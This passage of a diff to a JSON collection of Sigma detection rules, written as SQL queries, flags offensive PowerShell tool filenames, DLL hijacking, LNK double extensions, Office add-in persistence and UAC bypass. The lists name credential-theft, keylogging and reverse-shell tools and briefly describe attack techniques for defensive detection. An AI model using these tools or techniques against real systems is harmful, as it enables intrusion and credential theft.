TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE 
'\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE 
'\\'))" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", - "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Potential Initial Access via DLL Search Order Hijacking", + "id": "dbbd9f66-2ed3-4ca2-98a4-6ea985dd1a1c", + "status": "experimental", + "description": "Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking.", + "author": "Tim Rauch (rule), Elastic (idea)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access", + "attack.t1574", + "attack.t1574.001", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR Image LIKE '%\\\\MSPUB.EXE' ESCAPE '\\' OR Image LIKE '%\\\\fltldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE 
'\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft OneDrive\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\slack\\\\app-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\api-ms-win-core-%' ESCAPE '\\'))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_initial_access_dll_search_order_hijacking.yml" }, { - "title": "Possible DC Shadow Attack", - "id": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "title": "Suspicious LNK Double Extension Files", + "id": "3215aa19-f060-4332-86d5-5602511f3ca8", "status": "experimental", - "description": "Detects DCShadow via create new SPN", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "description": "Detects dropped files with LNK double extension, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.credential_access", - "attack.t1207" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Valid on domain controllers; exclude known DCs" + "Users creating a shortcut on e.g. 
desktop" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4742' AND ServicePrincipalNames LIKE '%GC/%' ESCAPE '\\') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'servicePrincipalName' AND AttributeValue LIKE 'GC/%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%.lnk' ESCAPE '\\' AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Office\\\\Recent\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\%' ESCAPE '\\')) OR (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Excel%' ESCAPE '\\') OR (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\PowerPoint%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Word%' ESCAPE '\\')))" ], - "filename": "win_security_possible_dc_shadow.yml" + "filename": "file_event_win_susp_lnk_double_extension.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", - "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "Potential RipZip Attack on 
Startup Folder", + "id": "a6976974-ea6f-4e97-818e-ea08625c52cb", + "status": "experimental", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ 
- "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Faulty legacy applications" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\'))))" ], - "filename": "win_security_susp_kerberos_manipulation.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - Security", - "id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", + "title": "Creation of a Diagcab", + "id": "3d0ed417-3d94-4963-a562-4a92c940656a", "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)", + "author": "frack113", + "tags": [ + "attack.resource_development" + ], + "falsepositives": [ + "Legitimate microsoft diagcab" + 
], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%.diagcab' ESCAPE '\\')" + ], + "filename": "file_event_win_susp_diagcab.yml" + }, + { + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%mshta%' ESCAPE '\\' AND 